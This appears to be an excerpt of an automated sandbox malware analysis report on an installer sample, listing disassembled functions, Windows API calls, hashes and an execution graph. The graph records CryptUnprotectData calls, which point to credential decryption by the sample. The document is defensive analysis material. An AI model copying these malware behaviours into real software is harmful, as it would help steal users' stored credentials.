                                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B47
                                                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405B59
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B37
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 2659869361-3081826266
                                                                                                        • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                        • Instruction ID: 377234fc647d40db67a969affeec1c2d2c00c7240f2da489af686c3f2ce23dc9
                                                                                                        • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                        • Instruction Fuzzy Hash: E1D05E711019246AC1117B448D04DDB63ACAE45300341046EF202B70A6C778695286FD
                                                                                                        Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                          • Part of subcall function 004052E2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                          • Part of subcall function 004052E2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                          • Part of subcall function 00405863: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
                                                                                                          • Part of subcall function 00405863: CloseHandle.KERNEL32(0040A230), ref: 00405899
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 3585118688-0
                                                                                                        • Opcode ID: 96e303a2e1a9cb485544aac6f60866d861ea88a023a06f5ccfe1ffd58367aca0
                                                                                                        • Instruction ID: 6eadcb4e995b32aeec71f8dd92363e70dac4c12fa3ca33f02f681fc447c81ee3
                                                                                                        • Opcode Fuzzy Hash: 96e303a2e1a9cb485544aac6f60866d861ea88a023a06f5ccfe1ffd58367aca0
                                                                                                        • Instruction Fuzzy Hash: AE11C831900508EBCF21AFA1CD8499E7B76EF44314F24407BF501B61E1D7798A92DB9D
                                                                                                        Function 004038DA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 004038EC
                                                                                                        • CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 00403900
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\nstA69B.tmp, xrefs: 00403910
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstA69B.tmp
                                                                                                        • API String ID: 2962429428-3809703559
                                                                                                        • Opcode ID: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                        • Instruction ID: de49926bb72e77a98f9c5ce19ed8b4a608a10c25b77e0dec4f49a46a5066bf07
                                                                                                        • Opcode Fuzzy Hash: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                        • Instruction Fuzzy Hash: E2E086B140071896C5246F7CAD4D9953A185F453357244326F078F60F0C7789A675A99
                                                                                                        Function 00405256 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32(?), ref: 00405285
                                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004052D6
                                                                                                          • Part of subcall function 00404293: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                        • Opcode ID: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
                                                                                                        • Instruction ID: e2cad66c9b02384d3be1b0302d87088ec840166322e374313d6fbb5223fafa3d
                                                                                                        • Opcode Fuzzy Hash: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
                                                                                                        • Instruction Fuzzy Hash: 5D01B1B1210709AFEF208F51DD80A6B3B35EF85361F10813BFA00761D1C77A9C529E29
                                                                                                        Function 00405863 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
                                                                                                        • CloseHandle.KERNEL32(0040A230), ref: 00405899
                                                                                                        Strings
                                                                                                        • Error launching installer, xrefs: 00405876
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                        • String ID: Error launching installer
                                                                                                        • API String ID: 3712363035-66219284
                                                                                                        • Opcode ID: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
                                                                                                        • Instruction ID: c820723d4e94d220d757831b92c48145409d5a390a225df4cf368edf7247e646
                                                                                                        • Opcode Fuzzy Hash: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
                                                                                                        • Instruction Fuzzy Hash: 22E046B4600209BFEB10AB60ED49F7B7BADEB04348F408431BD00F2190D778A8148A78
                                                                                                        Function 00405B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\JOSXXL1.exe,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405B89
                                                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\JOSXXL1.exe,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405B99
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrlen
                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                        • API String ID: 2709904686-224404859
                                                                                                        • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                        • Instruction ID: 9a844447357a9703a2937c3aa74ac44ffd17116a21dd7a3b54c6405c44ad0d39
                                                                                                        • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                        • Instruction Fuzzy Hash: 86D05EB2401D209AD3226B08DC01D9F73ACEF1130174A486AE441A61A5D7787D808AA8
                                                                                                        Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1780285237-0
                                                                                                        • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                        • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                        • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                        • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                        Function 00405CBD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE5
                                                                                                        • CharNextA.USER32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF6
                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 190613189-0
                                                                                                        • Opcode ID: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
                                                                                                        • Instruction ID: b93a28ad29d67f10a2270253d02d4651c85e208682c2a56c3792b5f99d5f0f7a
                                                                                                        • Opcode Fuzzy Hash: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
                                                                                                        • Instruction Fuzzy Hash: 6FF0F631104958BFC7129FA5DD00A9FBBA8EF05350B2580BAE841F7220D674DE01AF68

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:6.2%
                                                                                                        Total number of Nodes:113
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph 69010 3a934590 69011 3a9345f8 CreateWindowExW 69010->69011 69013 3a9346b4 69011->69013 69135 3a849970 69136 3a8499b6 GetCurrentProcess 69135->69136 69138 3a849a01 69136->69138 69139 3a849a08 GetCurrentThread 69136->69139 69138->69139 69140 3a849a45 GetCurrentProcess 69139->69140 69141 3a849a3e 69139->69141 69142 3a849a7b 69140->69142 69141->69140 69143 3a849aa3 GetCurrentThreadId 69142->69143 69144 3a849ad4 69143->69144 69014 3a938d18 69015 3a939020 69014->69015 69016 3a938d40 69014->69016 69017 3a938d49 69016->69017 69020 3a93826c 69016->69020 69019 3a938d6c 69021 3a938277 69020->69021 69022 3a939063 69021->69022 69024 3a938288 69021->69024 69022->69019 69025 3a939098 OleInitialize 69024->69025 69026 3a9390fc 69025->69026 69026->69022 69145 3a849bb8 DuplicateHandle 69146 3a849c4e 69145->69146 69027 15e018 69028 15e024 69027->69028 69033 39d77b69 69028->69033 69037 39d77b78 69028->69037 69041 39d77b77 69028->69041 69029 15e1d4 69035 39d77b70 69033->69035 69034 39d78029 69034->69029 69035->69034 69045 39d78431 69035->69045 69039 39d77b9a 69037->69039 69038 39d78029 69038->69029 69039->69038 69040 39d78431 CryptUnprotectData 69039->69040 69040->69039 69043 39d77b9a 69041->69043 69042 39d78029 69042->69029 69043->69042 69044 39d78431 CryptUnprotectData 69043->69044 69044->69043 69046 39d78440 69045->69046 69050 39d78a68 69046->69050 69058 39d78a59 69046->69058 69047 39d784b0 69047->69035 69051 39d78a8d 69050->69051 69054 39d78b41 69050->69054 69051->69054 69056 39d78a59 CryptUnprotectData 69051->69056 69057 39d78a68 CryptUnprotectData 69051->69057 69066 39d78c4a 69051->69066 69070 39d787a8 69054->69070 69056->69054 69057->69054 69059 39d78a68 69058->69059 69060 39d78b41 69059->69060 69063 39d78c4a CryptUnprotectData 69059->69063 69064 39d78a59 CryptUnprotectData 69059->69064 69065 39d78a68 CryptUnprotectData 69059->69065 69061 39d787a8 CryptUnprotectData 69060->69061 69062 39d78d0d 69061->69062 69062->69047 69063->69060 69064->69060 69065->69060 69067 39d78c5d 69066->69067 69068 39d787a8 CryptUnprotectData 69067->69068 69069 39d78d0d 69068->69069 69069->69054 69071 39d78ef8 CryptUnprotectData 69070->69071 69072 39d78d0d 69071->69072 69072->69047 69073 ad044 69074 ad05c 69073->69074 69075 ad0b6 69074->69075 69080 3a935498 69074->69080 69089 3a934748 69074->69089 69093 3a93325c 69074->69093 69102 3a934747 69074->69102 69081 3a9354d5 69080->69081 69082 3a935509 69081->69082 69084 3a9354f9 69081->69084 69122 3a933384 69082->69122 69106 3a9356fc 69084->69106 69112 3a935621 69084->69112 69117 3a935630 69084->69117 69085 3a935507 69090 3a93476e 69089->69090 69091 3a93325c CallWindowProcW 69090->69091 69092 3a93478f 69091->69092 69092->69075 69094 3a933267 69093->69094 69095 3a935509 69094->69095 69097 3a9354f9 69094->69097 69096 3a933384 CallWindowProcW 69095->69096 69098 3a935507 69096->69098 69099 3a935621 CallWindowProcW 69097->69099 69100 3a935630 CallWindowProcW 69097->69100 69101 3a9356fc CallWindowProcW 69097->69101 69099->69098 69100->69098 69101->69098 69103 3a93476e 69102->69103 69104 3a93325c CallWindowProcW 69103->69104 69105 3a93478f 69104->69105 69105->69075 69107 3a9356ba 69106->69107 69108 3a93570a 69106->69108 69126 3a9356e8 69107->69126 69129 3a9356d8 69107->69129 69109 3a9356d0 69109->69085 69114 3a935644 69112->69114 69113 3a9356d0 69113->69085 69115 3a9356d8 CallWindowProcW 69114->69115 69116 3a9356e8 CallWindowProcW 69114->69116 69115->69113 69116->69113 69119 3a935644 69117->69119 69118 3a9356d0 69118->69085 69120 3a9356d8 CallWindowProcW 69119->69120 69121 3a9356e8 CallWindowProcW 69119->69121 69120->69118 69121->69118 69123 3a93338f 69122->69123 69124 3a936bea CallWindowProcW 69123->69124 69125 3a936b99 69123->69125 69124->69125 69125->69085 69127 3a9356f9 69126->69127 69132 3a936b23 69126->69132 69127->69109 69130 3a9356f9 69129->69130 69131 3a936b23 CallWindowProcW 69129->69131 69130->69109 69131->69130 69133 3a933384 CallWindowProcW 69132->69133 69134 3a936b3a 69133->69134 69134->69127

                                                                                                        Executed Functions

                                                                                                        Function 001529E0 Relevance: 8.2, Strings: 6, Instructions: 685COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
